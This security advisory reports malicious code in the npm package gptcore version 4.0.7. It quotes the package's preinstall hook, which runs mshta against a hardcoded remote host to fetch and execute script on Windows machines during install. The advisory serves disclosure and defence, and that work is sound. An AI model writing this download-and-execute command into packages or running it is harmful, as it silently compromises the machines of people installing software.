MAL-2026-10204
Malicious code in gptcore (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c36c51510f3762d03ab5bd7132de4a65a950f410cb5771a99d4fdc9334a9c895) gptcore@4.0.7 declares a preinstall lifecycle script that runs `exec('cmd /c "mshta http://fixars.top"')` in preinstall.js. On Windows, this fires automatically during `npm install` and launches mshta.exe against the remote URL http://fixars.top, causing whatever HTA/JScript content that host currently serves to execute on the installer's machine. The destination is a hardcoded third-party host over plain HTTP, with no pinning, hash verification, or relationship to a legitimate publisher, and the fetched content is unrelated to any documented package purpose.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for gptcore (npm). Pin to a known-safe version or switch to an alternative.